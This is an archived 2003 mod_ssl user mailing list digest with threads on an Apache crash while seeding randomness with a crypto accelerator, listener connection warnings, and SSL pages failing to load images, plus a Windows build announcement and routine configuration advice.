Broadcom BCM5820 crypto accelerator board.  I'm using mod_ssl's 
experimental extensions to enable this board, and I'm using it through 
BSD's cryptodev subsystem.  When I first start the server, after 
configuration, and before forking daemons, it will dump core with 
either an Illegal Instruction or a Segmentation Fault.  It seems to do 
this intermittently, and not on a consistent basis.  It almost seems 
like the seeding process is not completing correctly the first time.  I 
have the random device set to /dev/urandom to enable BSD to provide 
entropy for mod_ssl.  It almost seems as if its ignoring this device 
and trying to get entropy from somewhere else.  Has anybody seen any 
behavior like this?

OS: FreeBSD 5.1R
Apache Version: 1.3.28
mod_ssl Version:  2.8.15
OpenSSL Version: 0.9.7a

mod_ssl configure:
   ./configure --with-apache=../apache_1.3.27 --with-mm=../mm-1.3.0

apache configure:
setenv LDFLAGS -L/usr/local/lib
setenv CFLAGS -I/usr/local/include
setenv EAPI_MM ../mm-1.3.0

./configure \
         --prefix=/private/apache \
         --enable-module=most \
         --enable-shared=max \
         --server-uid=www \
         --server-gid=www \
         --enable-suexec \
         --suexec-caller=www \
         --suexec-uidmin=2000 \
         --suexec-gidmin=100 \
         --suexec-docroot=/private/filer/www \
         --enable-module=ssl \
         --enable-shared=ssl \
         --enable-rule=SSL_EXPERIMENTAL \
         --activate-module=src/modules/mod_auth_ldap/mod_auth_ldap.c

Backtrace:

#0  0x282ef152 in engine_table_select () from /usr/lib/libcrypto.so.3
#1  0x282caeaa in ENGINE_get_default_RAND () from 
/usr/lib/libcrypto.so.3
#2  0x282c9ea5 in RAND_get_rand_method () from /usr/lib/libcrypto.so.3
#3  0x282c9fc9 in RAND_seed () from /usr/lib/libcrypto.so.3
#4  0x284ecefd in ssl_rand_feedfp () from 
/private/apache/libexec/libssl.so
#5  0x284ecbd0 in ssl_rand_seed () from 
/private/apache/libexec/libssl.so
#6  0x284e7f23 in ssl_init_TmpKeysHandle ()
    from /private/apache/libexec/libssl.so
#7  0x284e7c09 in ssl_init_Module () from 
/private/apache/libexec/libssl.so
#8  0x08059cf4 in ap_init_modules ()
#9  0x08064a7b in main ()
#10 0x0804f7f5 in _start ()

--
Jeremy C. McDermond                                                     
   mcdermj@peak.org
Lead Engineer
Peak Internet, LLC                                                      
                 (541) 738-4921

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct  3 05:58:55 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 17E60A8958; Fri,  3 Oct 2003 05:58:55 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from www.atpmail.com (atpmail.com [216.55.187.46])
	by master.modssl.org (Postfix) with ESMTP id B2F80A8934
	for ; Fri,  3 Oct 2003 05:58:37 +0200 (CEST)
Received: from www.atpmail.com (atpmail.com [216.55.187.46])
	by www.atpmail.com (8.12.9/8.12.9) with ESMTP id h933wZZQ048112
	for ; Thu, 2 Oct 2003 20:58:35 -0700 (PDT)
Received: (from alex@localhost)
	by www.atpmail.com (8.12.9/8.12.9/Submit) id h933wZ9s048109;
	Thu, 2 Oct 2003 20:58:35 -0700 (PDT)
Message-Id: <200310030358.h933wZ9s048109@www.atpmail.com>
To: modssl-users@modssl.org
From: "Alex Hart" 
Subject: Re: Apache warning: Connection refused: connect to listener
Date: Thu, 02 Oct 2003 23:58:35 -0400
X-Mailer: "ATPmail, Version 5.20"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Alex Hart" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> 
> > On Mon, Sep 29, 2003 at 11:06:31PM -0400, Alex Hart wrote:
> > > I just installed Apache/2.0.47 (Unix) mod_ssl/2.0.47 OpenSSL/0.9.7b 
> > > However, I keep getting the following line in my error log file (thousands 
> > of times):
> > > 
> > > [Wed Sep 24 12:51:15 2003] [warn] (61)Connection refused: connect to  listener
> > > 
> > > I have thousands of these warnings now in just a couple of days. 
> 
> ./httpd -V
> Server version: Apache/2.0.47
> Server built:   Sep 29 2003 18:29:13
> Server's Module Magic Number: 20020903:4
> Architecture:   32-bit
> Server compiled with....
>  -D APACHE_MPM_DIR="server/mpm/prefork"
>  -D APR_HAS_SENDFILE
>  -D APR_HAS_MMAP
>  -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
>  -D APR_USE_FLOCK_SERIALIZE
>  -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
>  -D APR_HAS_OTHER_CHILD
>  -D AP_HAVE_RELIABLE_PIPED_LOGS
>  -D HTTPD_ROOT="/usr/local/apache2"
>  -D SUEXEC_BIN="/usr/local/apache2/bin/suexec"
>  -D DEFAULT_PIDLOG="logs/httpd.pid"
>  -D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
>  -D DEFAULT_LOCKFILE="logs/accept.lock"
>  -D DEFAULT_ERRORLOG="logs/error_log"
>  -D AP_TYPES_CONFIG_FILE="conf/mime.types"
>  -D SERVER_CONFIG_FILE="conf/httpd.conf"
> 

More Info:

SSLSessionCache         dbm:logs/ssl_scache
SSLMutex  file:logs/ssl_mutex

I will try out different values for these, but I reinstalled without modssl, so I have to install modssl first. Seems like these are pretty standard settings. I'm surprised no one else has run across this warning.

Please let me know if there is anything else I can provide to help out.

- Alex Hart
http://atpmail.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct  3 10:49:33 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 586B1A8965; Fri,  3 Oct 2003 10:49:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 25873A893B
	for ; Fri,  3 Oct 2003 10:49:17 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id 7F0A16E4032; Fri,  3 Oct 2003 10:49:13 +0200 (CEST)
Date: Fri, 3 Oct 2003 10:49:13 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Apache warning: Connection refused: connect to listener
Message-ID: <20031003084913.GA21648@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <200310030358.h933wZ9s048109@www.atpmail.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200310030358.h933wZ9s048109@www.atpmail.com>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Oct 02, 2003 at 11:58:35PM -0400, Alex Hart wrote:
> More Info:
> 
> SSLSessionCache         dbm:logs/ssl_scache

Ususally I'd suggest using an shm based cache for performance reasons,
but that probably isn't the cause.

> SSLMutex  file:logs/ssl_mutex
> 
I seem to recall some sort of trouble with mutexes on bsd that has been
fixed recently - although your error message doesn't seem directly 
related, it might be worth looking into. Or possibly even going for the
latest cvs version in APACHE_2_0_BRANCH (a new release should be right
around the corner anyway).

> I will try out different values for these, but I reinstalled without modssl, so I have to install modssl first. Seems like these are pretty standard settings. I'm surprised no one else has run across this warning.
> 
I have heard one reporting similar problems on irc, but that's it.

vh

Mads Toftum
-- 
Speaking at ApacheCon 2003 - http://ApacheCon.com/
T03, "Apache 2 mod_ssl tutorial" (3h)
WE03, "Troubleshooting Apache configurations" 
WE11, "Apache mod_rewrite, the Swiss Army Knife of URL manipulation" 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  8 00:18:08 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 057DCA8942; Wed,  8 Oct 2003 00:18:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hotmail.com (bay9-f35.bay9.hotmail.com [64.4.47.35])
	by master.modssl.org (Postfix) with ESMTP id 54B67A8935
	for ; Wed,  8 Oct 2003 00:17:51 +0200 (CEST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Tue, 7 Oct 2003 15:17:49 -0700
Received: from 192.55.4.36 by by9fd.bay9.hotmail.msn.com with HTTP;
	Tue, 07 Oct 2003 22:17:49 GMT
X-Originating-IP: [192.55.4.36]
X-Originating-Email: [sarah_haff@hotmail.com]
From: "Sarah Haff" 
To: modssl-users@modssl.org
Subject: Webpage over SSL timing out?
Date: Tue, 07 Oct 2003 15:17:49 -0700
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 07 Oct 2003 22:17:49.0732 (UTC) FILETIME=[D7E89640:01C38D20]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Sarah Haff" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I appologize if this posting appears twice. :)

Hi,

We have a webserver that is serving image (gif/jpg) file over SSL. I am 
using Apache 2.46 compiled with SSL/PHP/mod_rewrite support. I did not 
include any other module.

The webserver seems to work fine. However if a webpage has mutiple image 
files, not all the image files load, and "broken image icons" are shown 
instead. Seems like the SSL/HTTP connection is timing out. Is there a way to 
increase this timeout period. I don't mind if take a little longer to load 
the page, but the user should see all the image file.

Another alternative is to use a HW based SSL solution like nCipher's CHIL. 
But I want to make that the last option, since I dont want to re-configure 
the HW/application on the server.

Any ideas on how other sites handle image files over SSL. I need the image 
file over SSL, because they are scanned images of confidential information.

Thanks.
Sarah.

_________________________________________________________________
Frustrated with dial-up? Get high-speed for as low as $29.95/month 
(depending on the local service providers in your area).  
https://broadband.msn.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  8 00:27:28 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 061F3A8942; Wed,  8 Oct 2003 00:27:27 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ares.cs.Virginia.EDU (mail.cs.Virginia.EDU [128.143.137.19])
	by master.modssl.org (Postfix) with ESMTP id 2F0A3A8935
	for ; Wed,  8 Oct 2003 00:27:11 +0200 (CEST)
Received: from cobra.cs.Virginia.EDU (cobra.cs.Virginia.EDU [128.143.137.16])
	by ares.cs.Virginia.EDU (8.12.10/8.12.10/UVACS-2003031900) with ESMTP id h97MQma7014295;
	Tue, 7 Oct 2003 18:26:49 -0400 (EDT)
Date: Tue, 7 Oct 2003 18:26:48 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: jcw5q@cobra.cs.Virginia.EDU
To: Sarah Haff 
Cc: modssl-users@modssl.org
Subject: Re: Webpage over SSL timing out?
In-Reply-To: 
Message-ID: 
References: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, 7 Oct 2003, Sarah Haff wrote:

> We have a webserver that is serving image (gif/jpg) file over SSL. I am
> using Apache 2.46 compiled with SSL/PHP/mod_rewrite support. I did not
> include any other module.
>
> The webserver seems to work fine. However if a webpage has mutiple image
> files, not all the image files load, and "broken image icons" are shown
> instead. Seems like the SSL/HTTP connection is timing out. Is there a way to
> increase this timeout period. I don't mind if take a little longer to load
> the page, but the user should see all the image file.

This is actually most likely a problem with either SSL session caching or
with "keepalive" HTTP requests.  What settings are you using for the
SSLSessionCache directive?  Does this only happen with Internet Explorer?
If so, are you using the SetEnvIf directive suggested at
http://httpd.apache.org/docs-2.0/ssl/ssl_faq.html#msie ?

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  8 01:00:32 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8A878A8942; Wed,  8 Oct 2003 01:00:32 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hotmail.com (bay9-f62.bay9.hotmail.com [64.4.47.62])
	by master.modssl.org (Postfix) with ESMTP id 73B7DA8935
	for ; Wed,  8 Oct 2003 01:00:13 +0200 (CEST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Tue, 7 Oct 2003 16:00:11 -0700
Received: from 192.55.4.36 by by9fd.bay9.hotmail.msn.com with HTTP;
	Tue, 07 Oct 2003 23:00:11 GMT
X-Originating-IP: [192.55.4.36]
X-Originating-Email: [sarah_haff@hotmail.com]
From: "Sarah Haff" 
To: jwoolley@apache.org
Cc: modssl-users@modssl.org
Subject: Re: Webpage over SSL timing out?
Date: Tue, 07 Oct 2003 16:00:11 -0700
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 07 Oct 2003 23:00:11.0865 (UTC) FILETIME=[C3234C90:01C38D26]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Sarah Haff" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>This is actually most likely a problem with either SSL session caching or
>with "keepalive" HTTP requests.  What settings are you using for the
>SSLSessionCache directive?  Does this only happen with Internet Explorer?
>If so, are you using the SetEnvIf directive suggested at
>http://httpd.apache.org/docs-2.0/ssl/ssl_faq.html#msie ?

Cliff,

Thanks for the response. The problems happens with Mozilla and IE.

Here is my SSLCache setting in ssl.conf
SSLSessionCache        shmcb:logs/ssl_scache(512000)
#SSLSessionCache         dbm:logs/ssl_scache
SSLSessionCacheTimeout  1300

and httpd.conf
#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300

#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On


Thanks.
Sarah.

_________________________________________________________________
Instant message in style with MSN Messenger 6.0. Download it now FREE!  
http://msnmessenger-download.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  8 01:00:57 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8CBA2A893C; Wed,  8 Oct 2003 01:00:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from tomts9-srv.bellnexxia.net (tomts9.bellnexxia.net [209.226.175.53])
	by master.modssl.org (Postfix) with ESMTP id 00692A8964
	for ; Wed,  8 Oct 2003 01:00:38 +0200 (CEST)
Received: from osts ([64.231.123.50]) by tomts9-srv.bellnexxia.net
          (InterMail vM.5.01.06.04 201-253-122-130-104-20030726) with ESMTP
          id <20031007230036.FZVV16280.tomts9-srv.bellnexxia.net@osts>;
          Tue, 7 Oct 2003 19:00:36 -0400
Subject: Correction: Apache_1.3.28-Mod_SSL_2.8.15-Opensss_0.9.7c.zip
From: hunter 
To: modssl-users@modssl.org
Cc: users@httpd.apache.org
Content-Type: text/plain
Message-Id: <1065567636.551.67.camel@ptak.tor>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.4.4 
Date: Tue, 07 Oct 2003 19:00:36 -0400
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

To all windows users of my Apache Windows builds:

If you downloaded Apache_1.3.28-Mod_SSL_2.8.15-Opensss_0.9.7c.zip
between Oct 1 and Oct 7 you have downloded the previous build due to a
*dumb* build error. After Oct 7 the zip has been properly made. You can
check your code by looking at the dates of the binaries - they should be
Oct 1 and not Jul 16, but the binaries in the new package are Oct 7. 

My appologies for any inconvenience this may have caused.




Following the last fix from OpenSSL both versions of Apache have been
updated.  

You have a choice of two sites: 

http://hunter.campbus.com/Apache_1.3.28-Mod_SSL_2.8.25-OpenSSL_0.9.7c-Win32.zip
http://hunter.campbus.com/Openssl-0.9.7c-Win32.zip

http://hunter.campbus.com/Apache_2.0.47-OpenSSL_0.9.7c-Win32.zip

My personal web server (a little bit slow) but all previous releases are
there and so are the MD5's.

http://tor.ath.cx/~hunter/apache/

If you have any problems contact me on the list, 
or theantigod (AT) sympatico.ca 

BTW: my personal account: hunter (AT) tor.ath.cx 
is being blocked by my ISP (Sympatico.ca)

Chris
  


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  8 01:07:34 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 54F8CA8942; Wed,  8 Oct 2003 01:07:34 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id D330CA8935
	for ; Wed,  8 Oct 2003 01:07:17 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id E75076E40BB; Wed,  8 Oct 2003 01:07:08 +0200 (CEST)
Date: Wed, 8 Oct 2003 01:07:08 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Webpage over SSL timing out?
Message-ID: <20031007230708.GA22104@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Oct 07, 2003 at 03:17:49PM -0700, Sarah Haff wrote:
> We have a webserver that is serving image (gif/jpg) file over SSL. I am 
> using Apache 2.46 compiled with SSL/PHP/mod_rewrite support. I did not 
> include any other module.
> 
> The webserver seems to work fine. However if a webpage has mutiple image 
> files, not all the image files load, and "broken image icons" are shown 
> instead. Seems like the SSL/HTTP connection is timing out. Is there a way 
> to increase this timeout period. I don't mind if take a little longer to 
> load the page, but the user should see all the image file.

Check Cliffs suggestions about SSLSessionCache (the shm type is preferable
for performance reasons).
Other suggestions could be turning on keepalives and possibly to remove
some of the weaker cipher options from SSLCipherSuite.
> 
> Another alternative is to use a HW based SSL solution like nCipher's CHIL. 
> But I want to make that the last option, since I dont want to re-configure 
> the HW/application on the server.
> 
How does the cpu usage look on the server? If the load isn't high, then
you probably won't win much with an ssl accelerator.

> Any ideas on how other sites handle image files over SSL. I need the image 
> file over SSL, because they are scanned images of confidential information.
> 
Just like any other file type - apache doesn't really care what it is.

vh

Mads Toftum
-- 
Speaking at ApacheCon 2003 - http://ApacheCon.com/
T03, "Apache 2 mod_ssl tutorial" (3h)
WE03, "Troubleshooting Apache configurations" 
WE11, "Apache mod_rewrite, the Swiss Army Knife of URL manipulation" 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  8 01:12:27 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EDB0CA8942; Wed,  8 Oct 2003 01:12:26 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id C26FDA8935
	for ; Wed,  8 Oct 2003 01:12:25 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id 3AEC96E40BB; Wed,  8 Oct 2003 01:12:25 +0200 (CEST)
Date: Wed, 8 Oct 2003 01:12:25 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Webpage over SSL timing out?
Message-ID: <20031007231225.GB22104@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Oct 07, 2003 at 04:00:11PM -0700, Sarah Haff wrote:
> Here is my SSLCache setting in ssl.conf
> SSLSessionCache        shmcb:logs/ssl_scache(512000)
> #SSLSessionCache         dbm:logs/ssl_scache
> SSLSessionCacheTimeout  1300
> 
Looks ok - you could try confirming that session caching works by
using the command: 

openssl s_client -connect HOST:PORT -reconnect

> and httpd.conf
> #
> # Timeout: The number of seconds before receives and sends time out.
> #
> Timeout 300
> 
> #
> # KeepAlive: Whether or not to allow persistent connections (more than
> # one request per connection). Set to "Off" to deactivate.
> #
> KeepAlive On
> 
This might be diabled elsewhere by something like (from the std config):

SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
	 downgrade-1.0 force-response-1.0
		  
You could try without it and see if it helps.

vh

Mads Toftum
-- 
Speaking at ApacheCon 2003 - http://ApacheCon.com/
T03, "Apache 2 mod_ssl tutorial" (3h)
WE03, "Troubleshooting Apache configurations" 
WE11, "Apache mod_rewrite, the Swiss Army Knife of URL manipulation" 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  8 01:45:58 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 139FAA8942; Wed,  8 Oct 2003 01:45:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hotmail.com (bay9-f7.bay9.hotmail.com [64.4.47.7])
	by master.modssl.org (Postfix) with ESMTP id 8EFBFA8935
	for ; Wed,  8 Oct 2003 01:45:41 +0200 (CEST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Tue, 7 Oct 2003 16:45:39 -0700
Received: from 192.55.4.36 by by9fd.bay9.hotmail.msn.com with HTTP;
	Tue, 07 Oct 2003 23:45:39 GMT
X-Originating-IP: [192.55.4.36]
X-Originating-Email: [sarah_haff@hotmail.com]
From: "Sarah Haff" 
To: mads@toftum.dk
Cc: modssl-users@modssl.org
Subject: Re: Webpage over SSL timing out?
Date: Tue, 07 Oct 2003 16:45:39 -0700
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 07 Oct 2003 23:45:39.0985 (UTC) FILETIME=[1D396010:01C38D2D]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Sarah Haff" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks for the reply Tuftom,

What is the difference between "shmht" and "shmcb" ?
#SSLSessionCache        shmht:logs/ssl_scache(512000)
SSLSessionCache        shmcb:logs/ssl_scache(512000)

i ran the openssl s_client -connect HOST:PORT -reconnect command

The difference between the cache and non-cached connection was:

multiple lines of
New, TLSv1/SSLv3, Cipher is EDH-RSA-DES-CBC3-SHA (with caching disabled)
vs
Reused, TLSv1/SSLv3, Cipher is EDH-RSA-DES-CBC3-SHA (with caching enabled)

So i guess "Reused" says the caching is working. Am I right?

Thanks
Sarah.

_________________________________________________________________
Instant message in style with MSN Messenger 6.0. Download it now FREE!  
http://msnmessenger-download.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  8 04:17:25 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3BF67A8942; Wed,  8 Oct 2003 04:17:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hotmail.com (bay9-f11.bay9.hotmail.com [64.4.47.11])
	by master.modssl.org (Postfix) with ESMTP id 71DA6A8935
	for ; Wed,  8 Oct 2003 04:17:08 +0200 (CEST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Tue, 7 Oct 2003 19:17:06 -0700
Received: from 192.55.4.36 by by9fd.bay9.hotmail.msn.com with HTTP;
	Wed, 08 Oct 2003 02:17:06 GMT
X-Originating-IP: [192.55.4.36]
X-Originating-Email: [sarah_haff@hotmail.com]
From: "Sarah Haff" 
To: modssl-users@modssl.org
Subject: Re: Webpage over SSL timing out?
Date: Tue, 07 Oct 2003 19:17:06 -0700
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 08 Oct 2003 02:17:06.0775 (UTC) FILETIME=[455F7E70:01C38D42]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Sarah Haff" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>Other suggestions could be turning on keepalives and possibly to remove
>some of the weaker cipher options from SSLCipherSuite.
How does removing weaker cipher improve the performance.

>How does the cpu usage look on the server? If the load isn't high, then
>you probably won't win much with an ssl accelerator.
It is a quad CPU server 2.8 Ghz, so the max CPU usage goes to 10% per CPU.

Thanks for all the help.
Sarah

_________________________________________________________________
Help protect your PC.  Get a FREE computer virus scan online from McAfee. 
http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  8 04:40:12 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8B4F7A8967; Wed,  8 Oct 2003 04:40:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from pluto.trimble.co.nz (pluto.trimble.co.nz [210.86.12.194])
	by master.modssl.org (Postfix) with ESMTP id F1D2AA8935
	for ; Wed,  8 Oct 2003 04:39:53 +0200 (CEST)
Received: (qmail 11413 invoked from network); 8 Oct 2003 15:39:32 +1300
Received: from venus.trimble.co.nz (10.3.0.220)
  by pluto.trimble.co.nz with SMTP; 8 Oct 2003 15:39:32 +1300
Received: (qmail 3634 invoked by uid 5106); 8 Oct 2003 02:39:32 -0000
Received: from jhaar@trimble.co.nz by venus.trimble.co.nz by uid 101 with qmail-scanner-1.20rc4 
 (trophie: 6.510-1002/646/55645. sophie: 3.02/2.14/3.69. spamassassin: 2.60.  Clear:RC:1:. 
 Processed in 0.041588 secs); 08 Oct 2003 02:39:32 -0000
Received: from crom.trimble.co.nz (10.3.0.198)
  by venus.trimble.co.nz with SMTP; 8 Oct 2003 02:39:31 -0000
Received: (qmail 32246 invoked by uid 500); 8 Oct 2003 02:39:31 -0000
Date: Wed, 8 Oct 2003 15:39:31 +1300
From: Jason Haar 
To: modssl-users@modssl.org
Subject: Re: Webpage over SSL timing out?
Message-ID: <20031008023931.GA31653@trimble.co.nz>
Mail-Followup-To: Jason Haar ,
	modssl-users@modssl.org
References:  <20031007231225.GB22104@toftum.dk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20031007231225.GB22104@toftum.dk>
User-Agent: Mutt/1.4.1i
Organization: Trimble Navigation New Zealand Ltd.
X-Spam-Rating: pluto.trimble.co.nz 1.6.3-jlh 0/200100/A
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jason Haar 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Bit of a "me too" here. Just today I noticed an issue whereby running a PHP
web page that does LDAP queries across our WAN was hanging forever (not an
SSL issue BTW - bad LDAP server). I hit the "Stop" button and tried
reloading to have another go - and the browser's "swirly thing" swirled away
forever - after ten minutes it was still going. A sniffer shows HTTPS
traffic between my workstation and the server - but the server never
attempted the second LDAP call - which makes me think the request never
happened (i.e. something got stuck in SSL land)

In the end the only fix was to either kill the browser, or restart the httpd
server.

